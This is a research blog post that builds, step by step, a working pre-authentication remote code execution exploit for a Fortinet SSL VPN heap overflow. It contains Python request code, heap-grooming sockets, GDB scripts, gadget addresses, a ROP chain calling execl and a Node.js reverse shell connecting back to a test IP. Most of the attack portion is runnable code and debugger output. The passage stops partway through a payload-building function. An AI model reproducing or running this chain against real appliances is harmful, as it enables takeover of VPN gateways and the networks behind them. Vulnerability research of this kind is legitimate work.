Background
Earlier this year, Lexfo published details of a pre-authentication remote code injection vulnerability in the Fortinet SSL VPN. Shortly thereafter, we published a vulnerability scanner and an analysis of vulnerable systems on the internet along with a proof-of-concept demo. This blog post will describe how we built that proof-of-concept exploit, step by step.
Our exploit follows the steps described in Lexfo’s original writeup of the vulnerability. This writeup was extremely helpful when building our exploit, and it includes a lot more detail on the vulnerability.
Test Environment
Our debugging environment consisted of a FortiGate 7.2.4 virtual machine which we modified to disable some self-verification functionality. After bypassing these integrity checks, we were able to install an SSH server, BusyBox, and debugging tools such as GDB.
The Vulnerability
The bug is a heap-based buffer overflow, due to an incorrect size check when decoding a URL parameter in the /remote/hostcheck_validate and /remote/logincheck endpoints. These endpoints take a hex-encoded string in the enc GET parameter with the following format:
FIGURE 1 - enc parameter format (source)
The seed field is combined with a “salt” and the static string “GCC is the GNU Compiler Collection.” to form a key. The salt is derived from the time at which sslvpnd was started and can be obtained with a GET request to /remote/info. Encryption is performed with a custom stream cipher built from MD5. The following Python3 code generates size bytes of keystream, which is then XOR'd with the plaintext data to generate the ciphertext:
from hashlib import md5

def gen_ks(salt, seed, size):
    magic=b'GCC is the GNU Compiler Collection.'
    k0=md5(salt+seed+magic).digest()
    keystream=k0
    while len(keystream)<size:
        k0=md5(k0).digest()
        keystream+=k0
    return keystream[:size]
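Because the cipher is a plain XOR against this keystream, applying it twice with the same salt and seed returns the original bytes. The sketch below illustrates that property; the helper name xor_with_keystream and the sample values are ours and are used only for illustration.

```python
from hashlib import md5

MAGIC = b"GCC is the GNU Compiler Collection."

def gen_ks(salt: bytes, seed: bytes, size: int) -> bytes:
    """Chain MD5 digests until at least `size` bytes of keystream exist."""
    block = md5(salt + seed + MAGIC).digest()
    keystream = block
    while len(keystream) < size:
        block = md5(block).digest()
        keystream += block
    return keystream[:size]

def xor_with_keystream(salt: bytes, seed: bytes, data: bytes) -> bytes:
    """Hypothetical helper: encrypts or decrypts, since XOR is its own inverse."""
    keystream = gen_ks(salt, seed, len(data))
    return bytes(d ^ k for d, k in zip(data, keystream))

salt = b"749a2b77"   # sample value; the real salt comes from /remote/info
seed = b"00bfbfbf"
plaintext = b"some plaintext longer than one MD5 block"
ciphertext = xor_with_keystream(salt, seed, plaintext)
roundtrip = xor_with_keystream(salt, seed, ciphertext)
```

This self-inverse behaviour is what later lets two requests with the same seed cancel each other out everywhere except at one chosen byte.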
The application will call fsv_malloc to allocate a buffer of size strlen(enc_parameter) / 2 + 1, and hex-decode the data into this buffer. It will then decrypt the length field and attempt to perform a bounds check. Unfortunately, this check is implemented incorrectly, and the length field is compared to the previously computed length of the hex-encoded enc parameter rather than the length of the allocated buffer. As a result, we can “decrypt” memory out-of-bounds of the buffer.
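To make the mistake concrete, here is a small Python model of the two checks. It is only a sketch: the function names are ours, and the exact comparison operator used by sslvpnd is an assumption. What matters is which length the field is compared against.

```python
def decoded_alloc_size(enc_hex: str) -> int:
    """Size of the buffer that holds the hex-decoded data (strlen / 2 + 1)."""
    return len(enc_hex) // 2 + 1

def flawed_check(enc_hex: str, length_field: int) -> bool:
    """Model of the buggy check: compares against the hex string length.
    Assumption: the real comparison may differ in strictness."""
    return length_field < len(enc_hex)

def intended_check(enc_hex: str, length_field: int) -> bool:
    """Model of what the check should have compared against."""
    return length_field < decoded_alloc_size(enc_hex)

# A parameter whose decoded form is 4 (seed) + 2 (length) + data bytes.
enc_hex = "00" * (4 + 2 + 0x1000 - 0x18 - 7)
length_field = 0x1f00

passes_flawed = flawed_check(enc_hex, length_field)
passes_intended = intended_check(enc_hex, length_field)
```

A length of 0x1f00 passes the flawed check because the hex string is roughly twice as long as the decoded buffer, so almost a full buffer's worth of adjacent memory is reachable.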
Heap Allocator
FortiOS uses jemalloc as its main allocator. Compared to the GNU libc malloc implementation, jemalloc is much more predictable and does not implement countermeasures against heap exploitation. As noted by Lexfo:
- Allocations are contiguous, without any heap metadata between chunks
- Freelists for chunks of a given size range are implemented with a LIFO mechanism, so we can reliably reclaim chunks
Like many other allocators, jemalloc uses different freelists for different chunk sizes. It can be helpful to keep these chunk sizes in mind when crafting allocations. The documentation includes a table of these size classes for 64-bit systems.
FIGURE 2 - Table of size classes and spacings for small chunks
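When planning allocations, it can help to compute the size class for a given request. The function below is a rough approximation of that table, assuming a 16-byte quantum and four classes per power-of-two group; it is our own helper and has not been checked against the jemalloc build shipped in FortiOS.

```python
def size_class(size: int) -> int:
    """Approximate jemalloc size class for a request of `size` bytes.

    Assumptions: 16-byte quantum up to 128 bytes, then four evenly spaced
    classes per power-of-two group (e.g. 0x1400, 0x1800, 0x1c00, 0x2000).
    """
    if size <= 8:
        return 8
    if size <= 128:
        return (size + 15) & ~15
    group_top = 1 << (size - 1).bit_length()   # next power of two >= size
    spacing = group_top >> 3                   # four classes in the upper half
    return (size + spacing - 1) & ~(spacing - 1)

for request in (0x1850, 0x1db8, 0x1000, 0x1018):
    print(hex(request), "->", hex(size_class(request)))
```

Under these assumptions, a 0x1db8-byte object lands in the 0x2000 class and a 0x1850-byte object in the 0x1c00 class, which matches the SSL structure sizes discussed later in this post.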
Our First Crash
With the initial theory in mind, let’s see if we can cause a crash.
We first define some helper functions to generate the encrypted data given a salt, seed, size field, and data.
import struct
from hashlib import md5

def gen_ks(salt, seed, size):
    magic=b'GCC is the GNU Compiler Collection.'
    k0=md5(salt+seed+magic).digest()
    ks=k0
    while len(ks)<size:
        k0=md5(k0).digest()
        ks+=k0
    return ks[:size]

def gen_enc_data(salt, seed, size, data):
    # plaintext is the little-endian 16-bit length field followed by the data
    plaintext=struct.pack("<H", size) + data
    keystream = gen_ks(salt, seed, len(plaintext))
    ciphertext = bytes(x[0]^x[1] for x in zip(plaintext, keystream)).hex()
    # the seed is sent in the clear, ahead of the hex-encoded ciphertext
    return seed.decode()+ciphertext
Next, we grab the salt from the remote server:
r=requests.get(BASEURL+"/remote/info", verify=False)
salt=r.content.split(b"salt='")[1].split(b"'")[0]
print("salt: "+salt.decode())
Using this salt, we generate the enc parameter. To trigger a 0x1000-byte allocation, we send 0x1000-4-2-1 bytes of data, accounting for the size of the seed and length fields as well as the extra byte that gets added by sslvpnd for the null terminator. Then, we set the length field to just under 0x2000 to trigger the bug.
payload='enc='+gen_enc_data(salt, b'00bfbfbf', 0x1f00, b'A'*(0x1000-4-2-1))
try:
    r=requests.post(BASEURL+'/remote/hostcheck_validate',
                    headers={'content-type':'application/x-www-form-urlencoded'},
                    verify=False, data=payload)
except requests.exceptions.ConnectionError:
    print('Crashed!')
We run this and... nothing happens. We get an error reply from the server, but no crash. What gives?
As it turns out, the answer is simple: the fsv_malloc function which allocates the response buffer adds 0x18 bytes of header information before calling jemalloc to allocate the actual data buffer. Changing the size of the data field to 0x1000-0x18-7 and re-running reliably results in a crash:
$ python3 crash.py
Salt: 749a2b77
Crashed!
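The size arithmetic is easy to get wrong, so here is a small sketch that derives the data length for a target chunk size and checks it in the other direction. The constant and function names are ours; the values (0x18-byte header, 4-byte seed, 2-byte length field, 1-byte terminator) are the ones described above.

```python
FSV_HEADER = 0x18    # header prepended by fsv_malloc
SEED_BYTES = 4       # 8 hex characters of seed decode to 4 bytes
LENGTH_BYTES = 2     # encrypted 16-bit length field
NUL_BYTE = 1         # the "+ 1" in strlen(enc) / 2 + 1

def data_len_for_chunk(chunk_size: int) -> int:
    """Number of data bytes to send so the request fills `chunk_size` exactly."""
    return chunk_size - FSV_HEADER - SEED_BYTES - LENGTH_BYTES - NUL_BYTE

def jemalloc_request_size(data_len: int) -> int:
    """Bytes requested from jemalloc for a payload of `data_len` data bytes."""
    hex_len = 2 * (SEED_BYTES + LENGTH_BYTES + data_len)
    return hex_len // 2 + NUL_BYTE + FSV_HEADER

first_attempt = jemalloc_request_size(0x1000 - 4 - 2 - 1)
fixed_attempt = jemalloc_request_size(data_len_for_chunk(0x1000))
print(hex(first_attempt), hex(fixed_attempt))
```

The first attempt asks jemalloc for 0x1018 bytes, which no longer fits a 0x1000-byte chunk, while the corrected length requests exactly 0x1000 bytes.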
Out of Bounds Write Primitive
The next step is to turn our crash into an out-of-bounds write primitive. The technique described by Lexfo is very powerful, and we were able to reproduce it without any issues.
We start by brute forcing a seed value which results in a keystream containing the target byte at the correct offset.
def gen_seed_for_offset(salt, offset, value):
    for i in range(0xffffff):
        seed="00{0:06x}".format(i).encode()
        ks=gen_ks(salt, seed, offset+1)
        if int(ks[offset])==int(value):
            return seed
    print("keystream search failed")
    return None
Next, we send two requests with the same seed. The first request will have a length field that causes sslvpnd to write the null terminator to the target byte. The second request will have a length field which is one byte larger, resulting in the target byte being “decrypted”. Since encryption uses XOR, and we have just set the target byte to 0, this results in writing a chosen value to the target offset. This will clobber the byte after the target value, but as you will see later, this isn’t an issue in practice. As an optimization, we can write a null byte by sending the same request twice, which means we can skip the brute force step.
def gen_seeds_u8(salt, offset, val):
    value=struct.pack("<B", val)
    if val==0:
        return [(b'00bfbfbf', offset-1), (b'00bfbfbf', offset-1)]
    s = gen_seed_for_offset(salt, offset, value[0])
    return [(s,offset-2),(s,offset-1)]
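The two-request trick is easier to follow in a toy model. The sketch below simulates a region of memory and a simplified "decrypt n bytes, then null-terminate" operation; server_decrypt and find_seed are hypothetical names of ours. The model deliberately ignores the 2-byte length field (which is why the real helper above uses offset-2 and offset-1 as lengths) and the fact that the in-bounds part of the buffer is rewritten by each request.

```python
from hashlib import md5

MAGIC = b"GCC is the GNU Compiler Collection."

def gen_ks(salt: bytes, seed: bytes, size: int) -> bytes:
    block = md5(salt + seed + MAGIC).digest()
    keystream = block
    while len(keystream) < size:
        block = md5(block).digest()
        keystream += block
    return keystream[:size]

def server_decrypt(memory: bytearray, keystream: bytes, n: int) -> None:
    """Toy model of one request: XOR n bytes in place, then write a NUL at index n."""
    for i in range(n):
        memory[i] ^= keystream[i]
    memory[n] = 0

def find_seed(salt: bytes, index: int, value: int) -> bytes:
    """Brute force a seed whose keystream has `value` at `index`."""
    for i in range(0x1000000):
        seed = "00{0:06x}".format(i).encode()
        if gen_ks(salt, seed, index + 1)[index] == value:
            return seed
    raise ValueError("keystream search failed")

salt = b"749a2b77"                      # sample salt
memory = bytearray(b"\xcc" * 32)        # stand-in for memory we do not control
target, value = 20, 0x41

seed = find_seed(salt, target, value)
keystream = gen_ks(salt, seed, target + 1)
server_decrypt(memory, keystream, target)       # request 1: memory[target] = 0
server_decrypt(memory, keystream, target + 1)   # request 2: memory[target] = 0 ^ ks[target]
print(memory.hex())
```

In this model, every byte before the target is XORed twice and therefore restored, the target holds the chosen value, and the following byte is clobbered with a null.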
We know that we will want to write pointer values later, so we also make a helper function to generate seeds for pointers. For these values, we will start with the last byte of the 64-bit value and work backwards to avoid clobbering later data with the null byte that gets written by sslvpnd. Next, we can use the same optimization of skipping the brute force when writing null bytes. Additionally, on x86-64, user mode addresses start with two null bytes. This means we are never at risk of clobbering important data when we write a pointer to memory.
def gen_seeds_u64(salt, offset, val):
    value=struct.pack("<Q", val)
    seeds=[]
    n=7
    for i in range(n,-1,-1):
        if value[i]!=0:
            s=gen_seed_for_offset(salt, offset+i, value[i])
            seeds.append((s, offset+i-1))
            seeds.append((s, offset+i-2))
        else:
            # save some time by skipping the brute force.
            # the application will write a null terminator to buf[size]
            seeds.append((b'00bfbfbf', offset+i-1))
            seeds.append((b'00bfbfbf', offset+i-1))
    return seeds[::-1]
Heap Grooming
Our goal is to overwrite a callback in an SSL struct. This means we will have to be able to reliably and repeatedly allocate our payload immediately before an SSL struct. Again, we follow Lexfo’s methodology of using a socket, which triggers allocations of a request buffer and an SSL structure in the same heap region, and then attempting to de-allocate the request buffer and allocate a new request buffer in its place. On our 64-bit system running version 7.2.4, the SSL struct has a size of 0x1db8 and is therefore allocated in the 0x2000 byte region. On older systems, we observed the SSL structure was 0x1850, and therefore allocated in the 0x1c00 region. Most of this writeup will assume a size of 0x2000.
To track down sources of allocations and deallocations, we made a GDB script that would print out useful debugging information while we made requests:
set height 0
set pagination off
set disassembly-flavor intel
handle SIGPIPE nostop

# break after allocating the buffer, grab the address
b *0x0173164e
commands
  silent
  set $heap_obj = $rax
  printf "buffer: %p\n", $heap_obj
  c
end

# print address of SSL objects when malloc'd
b *CRYPTO_zalloc+37 if ( $r12 == 0x1db8 )
commands
  silent
  printf "CRYPTO_zalloc(0x%x) = %p\n", $r12, $rax
  c
end

# break in malloc helper function (used by vulnerable function)
b *0x018021d6 if (($r13>0x1c00) && ($r13<=0x2000))
commands
  silent
  set $size = $r13
  set $addr = $rax
  printf "malloc(0x%x) = %p\n", $size, $addr
  c
end

# break in je_malloc in case something calls je_malloc directly
b *je_malloc if (($rdi>0x1c00) && ($rdi <=0x2000))
commands
  silent
  printf "je_malloc(%x)\n", $rdi
  c
end
The exact addresses and registers that we use in this script were identified through static analysis and will need to be changed for each version you test. Using this script, we were able to minimize noise due to extraneous allocations, and reliably obtain the heap layout we want. This boils down to a few steps:
- Create a requests.Session and issue a request to establish the TLS connection
- Create a bunch of sockets to fill in holes on the heap
- Send a very long message on one of the sockets, causing its data buffer to be freed and re-allocated elsewhere
- Send multiple requests (using the Session established in step one) which each cause a 0x2000 byte allocation, and use them to overwrite the SSL struct
Step one is easy. We create a session with sess=requests.Session(), and replace our requests.get()/post() with sess.get()/post(). This will avoid repeatedly deallocating and reallocating the SSL object associated with our connection, resulting in much less noise on the heap.
Steps two and three are also easy:
import socket
import ssl

# Disable SSL verification
context = ssl.SSLContext()
context.verify_mode=ssl.CERT_NONE
ssocks=[]

# Create one SSL socket and save it in the global ssocks list
def create_ssl_conn():
    s=socket.create_connection(HOST, timeout=None)
    ss=context.wrap_socket(s)
    ssocks.append(ss)

for i in range(20):
    create_ssl_conn()

# Pick one SSL socket and force its data buffer to be reallocated
ssocks[-2].send(b'A'*0x2001)
Step four is something we have already done: send requests to “decrypt” out-of-bounds data. We will use our helper functions from earlier to create a list of seeds and length fields. We will then iterate through this list and send a request with the size and seed set correctly, and the data field will be 0x2000-0x18-7 bytes long, so we trigger a 0x2000 byte allocation.
One last note about the data field is that the plaintext must have a null byte before the first & or =. Otherwise, more allocations may occur. We work around this by simply starting our data with a few nulls.
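A quick sanity check for this constraint can be added before sending. The helper below is our own addition, not part of the original exploit, and only encodes the rule stated above: a null byte must appear before the first & or = in the plaintext.

```python
def nul_precedes_delimiters(data: bytes) -> bool:
    """Return True if a NUL byte appears before the first '&' or '=' in data."""
    nul_index = data.find(b"\0")
    if nul_index == -1:
        return False
    delimiter_indexes = [i for i in (data.find(b"&"), data.find(b"=")) if i != -1]
    return not delimiter_indexes or nul_index < min(delimiter_indexes)

good = b"\0" * 8 + b"key=value&other=1"
bad = b"key=value\0"
print(nul_precedes_delimiters(good), nul_precedes_delimiters(bad))
```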
RIP Control
Now that we have tamed the heap, we can work on the last few steps of achieving RCE. Right now, the hex-decoded data buffer is located 0x2000-0x18 bytes before the SSL structure. The first 4 bytes of this are the plaintext seed, followed by the encrypted size field and data payload. This means that when calculating offsets for our seed generation, the first byte of the SSL structure is at offset 0x2000-0x18-4. We know from Lexfo’s writeup that we will want to overwrite the handshake_func callback, which is at offset 0x30 within this structure. We also know from Orange Tsai’s writeup of CVE-2018-13383 that OpenSSL calls SSL_in_init before calling handshake_func. SSL_in_init checks the in_init field in our SSL structure, which will be false for established connections. Let’s overwrite these fields and see what happens.
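Spelled out in Python, the offsets look like this. The 0x30 offset for handshake_func comes from the paragraph above, and the 0x64 offset for in_init is the value used in the full proof of concept at the end of this post; both are specific to the build we tested. The constant names are ours.

```python
CHUNK_SIZE = 0x2000   # jemalloc size class shared by our buffer and the SSL struct
FSV_HEADER = 0x18     # header added by fsv_malloc before the decoded data
SEED_BYTES = 4        # plaintext seed at the start of the decoded data

# Offset of the adjacent SSL structure, measured from the encrypted length field
ssl_offset = CHUNK_SIZE - FSV_HEADER - SEED_BYTES

# Fields we want to overwrite inside the SSL structure
handshake_func = ssl_offset + 0x30
in_init = ssl_offset + 0x64

print(hex(ssl_offset), hex(handshake_func), hex(in_init))
```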
In our exploit script, we add:
seeds=[]
seeds.extend(gen_seeds_u64(salt, handshake_func, 0x4141414141414141))
seeds.extend(gen_seeds_u8(salt, in_init, 1))
for i in seeds:
    print((i[0], hex(i[1]-ssl_offset)))
    make_req(sess, salt, i[0], i[1], b'\0'*8 + b'A'*(0x2000-0x18-7-8))
And when we observe the results in GDB, we see:
(gdb) c Continuing. CRYPTO_zalloc(0x1db8) = 0x7f6e3ead9000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb1e000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb2a000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb2e000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb3f000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb43000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb47000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb51000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb55000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb59000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb5d000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb61000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb16000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb6e000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb72000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb76000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb7a000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb84000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb88000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb8c000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb90000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb94000 CRYPTO_zalloc(0x1db8) = 0x7f6e3ebbc000 CRYPTO_zalloc(0x1db8) = 0x7f6e3ebc0000 CRYPTO_zalloc(0x1db8) = 0x7f6e3ebc4000 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 Program 
received signal SIGSEGV, Segmentation fault. 0x00007f6e43f2fe1b in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.3 (gdb) x/i $rip => 0x7f6e43f2fe1b: call QWORD PTR [rbp+0x30] (gdb) x/gx $rbp+0x30 0x7f6e3ebc0030: 0x4141414141414141 (gdb)
As expected, the program crashes when trying to jump to 0x4141414141414141! Only a few more steps now.
Stack Pivot
The heap, where our data is located, is not mapped as executable. This means we won’t be able to send some shellcode and jump to it. We can easily make a ROP chain since the process doesn’t use ASLR, but since we don’t control data on the stack, the first gadget on the ROP chain will return to an address that we can’t control. This means we will have to find a way to point the stack pointer at something we can control. Looking at registers, we saw that both RDI and RBP point to the SSL structure that we can overwrite.
Using ropr, we find a push rdi; pop rsp; ret gadget at address 0xfd0582. Using this, we can place a second gadget at the start of the SSL structure and let it run. Unfortunately, the field after this is method, which is a pointer to a function table that we can’t safely overwrite without causing a crash. This means we must use another stack pivot gadget to adjust the stack pointer again. Since the stack pointer is already pointing close to our data, we attempt to find a gadget which would subtract a small value from RSP, causing it to point into our data buffer. Unfortunately, we can’t find a good gadget and settle for an add rsp, 0x270; pop rbx; pop r12; pop rbp; ret; gadget instead. That means, after the second stage of our ROP gadget, we are pointing the stack at SSL+0x290. Luckily, we finally have enough room to fit a longer ROP payload here.
In the last stage of our pivot gadget, RDI is still pointing at our SSL structure. We find a sub rdi, 0x100 gadget at 0x1afd214 and follow it with the original push rdi; pop rsp; gadget to finally point our stack into the data buffer which we control. We could have alternatively used the write primitive to insert our entire ROP chain into the SSL structure, but that would require brute forcing more seeds and sending more requests, which would slow down the exploit significantly.
The three-stage pivot setup looks like this:
# set rsp = *SSL
PIVOT_1=0x00fd0582 # push rdi; pop rsp; ret
# rsp=*SSL+0x290
PIVOT_2=0x008ecb49 # add rsp, 0x270; pop rbx; pop r12; pop rbp; ret;
# rsp = *SSL-0x100
PIVOT_3=0x01afd214 # sub rdi, 0x100; test rax, rax; cmove rax, rdi; ret;

seeds=[]
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x30, PIVOT_1))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x00, PIVOT_2))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x290, PIVOT_3))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x298, PIVOT_1))
seeds.extend(gen_seeds_u8(salt, in_init, 1))
And running that results in:
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0000000000fd0584 in ?? ()
(gdb) i r rdi rsp
rdi            0x7f6e3ebbff00      0x7f6e3ebbff00
rsp            0x7f6e3ebbff00      0x7f6e3ebbff00
(gdb) x/8gx $rsp
0x7f6e3ebbff00: 0x4141414141414141 0x4141414141414141
0x7f6e3ebbff10: 0x4141414141414141 0x4141414141414141
0x7f6e3ebbff20: 0x4141414141414141 0x4141414141414141
0x7f6e3ebbff30: 0x4141414141414141 0x4141414141414141
(gdb) x/8gx $rsi+0x100
0x7f6e3ebc0000: 0x00000000008ecb49 0x00007f6e43f7f700
0x7f6e3ebc0010: 0x00007f6e3eacc660 0x00007f6e3eacc660
0x7f6e3ebc0020: 0x0000000000000000 0x0000000000000001
0x7f6e3ebc0030: 0x0000000000fd0582 0x0000000000000000
(gdb)
As expected, our stack points to 0x100 bytes from the end of our data buffer, or 0x100 bytes before the start of the SSL structure. This gives us plenty of room to fit a ROP chain in our buffer.
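To double-check the pivot arithmetic, the following sketch traces RSP and RDI through the three gadgets by hand. It is a paper model rather than an emulator: it assumes each gadget does exactly what its comment says, and it uses the SSL structure address from the GDB output above.

```python
SSL = 0x7f6e3ebc0000   # address of the targeted SSL structure in our GDB session

def trace_pivot(ssl: int):
    """Follow rsp/rdi through PIVOT_1 -> PIVOT_2 -> PIVOT_3 -> PIVOT_1."""
    rdi = ssl              # rdi points at the SSL structure when handshake_func is called

    # PIVOT_1 (written at SSL+0x30): push rdi; pop rsp; ret
    rsp = rdi              # rsp = SSL
    rsp += 8               # ret pops PIVOT_2 from SSL+0x00

    # PIVOT_2: add rsp, 0x270; pop rbx; pop r12; pop rbp; ret
    rsp += 0x270
    rsp += 3 * 8           # three pops
    after_stage_two = rsp  # next return address is read from here
    rsp += 8               # ret pops PIVOT_3 from SSL+0x290

    # PIVOT_3: sub rdi, 0x100; ...; ret
    rdi -= 0x100
    rsp += 8               # ret pops PIVOT_1 from SSL+0x298

    # PIVOT_1 again: push rdi; pop rsp; (about to ret into our buffer)
    rsp = rdi
    return after_stage_two, rsp

after_stage_two, final_rsp = trace_pivot(SSL)
print(hex(after_stage_two), hex(final_rsp))
```

The final value, 0x7f6e3ebbff00, matches the rsp and rdi values shown by GDB at the crash.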
ROP Chain
Although it would be nice to simply call system('<commands>'), FortiOS uses a custom binary for /bin/sh which restricts what commands you can run. As a result, trying to run anything useful using system() or popen() will fail. Instead of using one of these convenient wrappers, we will construct a slightly less convenient ROP chain which calls execl. As a proof-of-concept, we will run execl('/bin/node', '/bin/node', '-e', '<node payload>', NULL).
The actual Node payload will be a slightly modified version of the NodeJS reverse shell we found in the PayloadsAllTheThings GitHub repository. Specifically, instead of running /bin/sh, we run /bin/node and pass in the -i argument for an interactive prompt. We also modify the connect-back IP to suit our test environment.
shell=b"""(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/node", ["-i"]);
    var client = new net.Socket();
    client.connect(4242, "192.168.250.110", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
"""
Since we have plenty of space for our ROP chain, we don’t try to optimize it too much. The simplified, pseudo-assembly version of our ROP chain is below.
mov rax, rdi                          ; rax = SSL-0x100
mov rcx, ~(0x1000-1)
and rax, rcx
mov rcx, rax                          ; rcx = SSL-0x1000
mov [scratch_buffer+0], "/bin/nod"
mov [scratch_buffer+8], "e\0-e\0\0\0\0"
mov rdi, &scratch_buffer              ; "/bin/node"
mov rsi, &scratch_buffer              ; "/bin/node"
mov rdx, &scratch_buffer+10           ; "-e\0"
mov r8, 0                             ; NULL
jmp execl                             ; execl("/bin/node", "/bin/node", "-e", payload, NULL);
Because of how jemalloc allocates memory, we know that our allocated buffer will be aligned to 0x2000 bytes. We also know that rdi is a pointer to our ROP chain, since that’s the register we used to jump to our ROP chain in the first place. By masking out the bottom 12 bits, we point rcx into the middle of our buffer, which gives us plenty of room to add NodeJS code to do whatever we want. As for the other arguments, we decide to pick a fixed address that is readable and writable to use as a scratch buffer. We can then use a simple group of gadgets to write /bin/node\0-e\0\0\0\0 to that buffer. From there, we pop hardcoded values into rdi, rsi, rdx, and r8. Once that’s done, we jump to execl and our payload runs.
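The masking step and the scratch-buffer constants can be checked with plain arithmetic. This sketch uses the chunk address from our GDB session as an example; the variable names are ours.

```python
import struct

chunk = 0x7f6e3ebbe000        # 0x2000-aligned chunk holding our request buffer
ssl_struct = chunk + 0x2000   # the SSL structure sits in the next chunk
rdi = ssl_struct - 0x100      # value left in rdi by the final pivot

# and rax, 0xfffffffffffff000 clears the low 12 bits
rcx = rdi & 0xfffffffffffff000

# The 16-byte scratch string is written as two little-endian 64-bit values
scratch = b"/bin/node\0-e\0\0\0\0"
first_qword, second_qword = struct.unpack("<2Q", scratch)
argv_1_offset = scratch.index(b"-e\0")

print(hex(rcx), hex(first_qword), hex(second_qword), argv_1_offset)
```

The masked pointer lands exactly 0x1000 bytes into the chunk, and the "-e" argument starts 10 bytes into the scratch buffer, which is where the pseudo-assembly above points rdx.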
def pad(d, n, c=b'\0'):
    return d+c*(n-len(d))

def u64(x):
    return struct.pack("<Q", x)

def make_ropchain():
    scratch=b'/bin/node\0-e\0\0\0\0'
    scratch_vals=struct.unpack("<2Q", scratch)
    scratch_addr=0x04825000
    argv_1=scratch_addr+scratch.index(b"-e\0")
    rop =b''
    # 1. point rcx to offset 0x1000 within our data buffer, where we have our JS payload
    rop+=u64(0x02b228a0) # mov rax, rdi; ret;
    rop+=u64(0x00b15381) # pop rcx; ret
    rop+=u64(0xfffffffffffff000)
    rop+=u64(0x02c85e40) # and rax, rcx; ret;
    rop+=u64(0x00b15381) # pop rcx; ret
    rop+=u64(0) # <rcx = 0>
    rop+=u64(0x02166fa9) # or rcx, rax; ...; ret;
    # 2. write "/bin/node\0-e\0" to a scratch buffer
    rop+=u64(0x02c87265) # pop rax; ret;
    rop+=u64(scratch_vals[0]) # "/bin/nod"
    rop+=u64(0x02ca1f52) # pop rsi; ret;
    rop+=u64(scratch_addr) # <scratch buffer>
    rop+=u64(0x029e36dd) # mov [rsi], rax; ret
    rop+=u64(0x02c87265) # pop rax; ret;
    rop+=u64(scratch_vals[1]) # "e\0-e\0\0\0\0"
    rop+=u64(0x02ca1f52) # pop rsi; ret;
    rop+=u64(scratch_addr+8) # <scratch buffer>
    rop+=u64(0x029e36dd) # mov [rsi], rax; ret
    # setup arguments for execl
    rop+=u64(0x02ca0763) # pop rdi; ret;
    rop+=u64(scratch_addr) # "/bin/node"
    rop+=u64(0x02ca1f52) # pop rsi; ret;
    rop+=u64(scratch_addr) # "/bin/node"
    rop+=u64(0x02b76f39) # pop rdx
    rop+=u64(argv_1) # "-e"
    rop+=u64(0x0289a815) # REX.WRXB pop r8
    rop+=u64(0)
    # rcx already points to the last argument
    # 3. call execl("/bin/node", "/bin/node", "-e", "<command>", NULL);
    rop+=u64(0x0043b170) # execl@PLT
    # pad to size
    assert len(rop) < 0x100
    return rop
We construct the data buffer to place our JS payload at 0x1000 within the chunk, and the ROP chain at 0x1f00 within the chunk.
payload_size=0x2000-0x18-7
payload =(b'\0'*8) + (b'A'*(0x1000-0x18-8-6))
payload+=pad(shell, 0x1000-0x100)
payload+=make_ropchain()
payload =pad(payload, payload_size)
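The layout can be verified offline by building the same buffer with short marker strings in place of the real shell and ROP chain, then converting payload offsets into chunk offsets. The markers and the build_payload wrapper are ours; the prefix of 0x18 + 4 + 2 bytes is the fsv_malloc header, the plaintext seed, and the length field that precede the data inside the chunk.

```python
def pad(d: bytes, n: int, c: bytes = b"\0") -> bytes:
    return d + c * (n - len(d))

def build_payload(shell: bytes, rop: bytes) -> bytes:
    """Same construction as above, with the shell and ROP chain passed in."""
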